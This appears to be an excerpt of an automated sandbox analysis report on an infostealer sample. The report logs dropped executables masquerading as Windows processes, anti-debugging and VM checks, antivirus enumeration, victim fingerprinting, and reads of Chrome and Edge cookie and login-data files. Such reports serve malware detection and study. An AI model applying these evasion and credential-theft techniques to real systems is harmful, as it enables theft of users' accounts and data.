                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 591000Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 590438Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 590203Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589891Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589516Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 589233Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588907Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588453Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 588061Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 587141Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586719Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586313Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 586016Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585719Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585453Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 585091Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 584762Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583985Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583672Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583424Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583297Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583187Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 583062Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582953Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582844Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582732Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582625Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582516Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582406Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582297Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582184Jump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeThread delayed: delay time: 582078Jump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                                    Source: loader.exe, 00000000.00000003.2180344314.000000000311F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9R
                                    Source: OvRN5nW0jy.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                                    Source: OvRN5nW0jy.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                                    Source: OvRN5nW0jy.17.drBinary or memory string: discord.comVMware20,11696487552f
                                    Source: OvRN5nW0jy.17.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                                    Source: OvRN5nW0jy.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                                    Source: OvRN5nW0jy.17.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: global block list test formVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: tasks.office.comVMware20,11696487552o
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Uhgfsd
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                                    Source: OvRN5nW0jy.17.drBinary or memory string: AMC password management pageVMware20,11696487552
                                    Source: w32tm.exe, 00000010.00000002.2402978545.00000259BE899000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3518599961.000000001D096000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: OvRN5nW0jy.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                                    Source: OvRN5nW0jy.17.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: dev.azure.comVMware20,11696487552j
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                                    Source: OvRN5nW0jy.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                                    Source: wscript.exe, 00000002.00000003.2286112054.0000000003412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\w
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                                    Source: OvRN5nW0jy.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                                    Source: loader.exe, loader.exe, 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                                    Source: chainPorthostCommon.exe, 00000005.00000002.2360055756.000000001DCC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
                                    Source: OvRN5nW0jy.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                                    Source: OvRN5nW0jy.17.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                                    Source: loader.exe, loader.exe, 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                                    Source: OvRN5nW0jy.17.drBinary or memory string: outlook.office.comVMware20,11696487552s
                                    Source: loader.exe, 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                                    Source: loader.exe, loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Uhgfs
                                    Source: C:\Users\user\Desktop\loader.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    Source: C:\Users\user\Desktop\loader.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeOpen window title or class name: ollydbg
                                    Source: C:\Users\user\Desktop\loader.exeFile opened: SIWDEBUG
                                    Source: C:\Users\user\Desktop\loader.exeFile opened: NTICE
                                    Source: C:\Users\user\Desktop\loader.exeFile opened: SICE
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00657DEE mov eax, dword ptr fs:[00000030h]0_2_00657DEE
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_04FF606C mov eax, dword ptr fs:[00000030h]0_2_04FF606C
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_04FF6391 mov eax, dword ptr fs:[00000030h]0_2_04FF6391
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0064B7E0 __EH_prolog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,_swprintf,_swprintf,_swprintf,ShellExecuteExW,_swprintf,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongW,SetWindowLongW,SetDlgItemTextW,_wcslen,_swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,0_2_0064B7E0
                                    Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe "C:\ServerWinRuntimeBroker/chainPorthostCommon.exe"Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline"Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline"Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC121.tmp" "c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\LiveKernelReports\RuntimeBroker.exe "C:\Windows\LiveKernelReports\RuntimeBroker.exe" Jump to behavior
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000038B3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.0000000003970000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .1",5,1,"","user","134349","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\LiveKernelReports","D8ER27LA (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United Stat
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","134349","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\LiveKernelReports","D8ER27LA (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0064F654 cpuid 0_2_0064F654
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeQueries volume information: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe VolumeInformationJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeQueries volume information: C:\Windows\LiveKernelReports\RuntimeBroker.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeQueries volume information: C:\Windows\DiagTrack\Scenarios\dasHost.exe VolumeInformation
                                    Source: C:\Recovery\conhost.exeQueries volume information: C:\Recovery\conhost.exe VolumeInformation
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeQueries volume information: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe VolumeInformation
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeQueries volume information: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe VolumeInformation
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeQueries volume information: C:\Windows\DiagTrack\Scenarios\dasHost.exe VolumeInformation
                                    Source: C:\Recovery\conhost.exeQueries volume information: C:\Recovery\conhost.exe VolumeInformation
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeQueries volume information: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe VolumeInformation
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    Source: Yara match, File source: 00000011.00000002.3435800974.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: Process Memory Space: chainPorthostCommon.exe PID: 2308, type: MEMORYSTR
                                    Source: Yara match, File source: Process Memory Space: RuntimeBroker.exe PID: 6008, type: MEMORYSTR
                                    Source: Yara match, File source: Process Memory Space: dasHost.exe PID: 3404, type: MEMORYSTR
                                    Source: Yara match, File source: loader.exe, type: SAMPLE
                                    Source: Yara match, File source: 0.3.loader.exe.5d2d70d.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.loader.exe.74d170d.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 5.0.chainPorthostCommon.exe.4b0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.loader.exe.5d2d70d.1.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.loader.exe.74d170d.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 00000000.00000003.2162490833.0000000005BE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000000.00000003.2161189771.0000000007387000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000005.00000000.2286038382.00000000004B2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match, File source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, type: DROPPED
                                    Source: Yara match, File source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Program Files (x86)\Microsoft\csrss.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Recovery\conhost.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, type: DROPPED
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
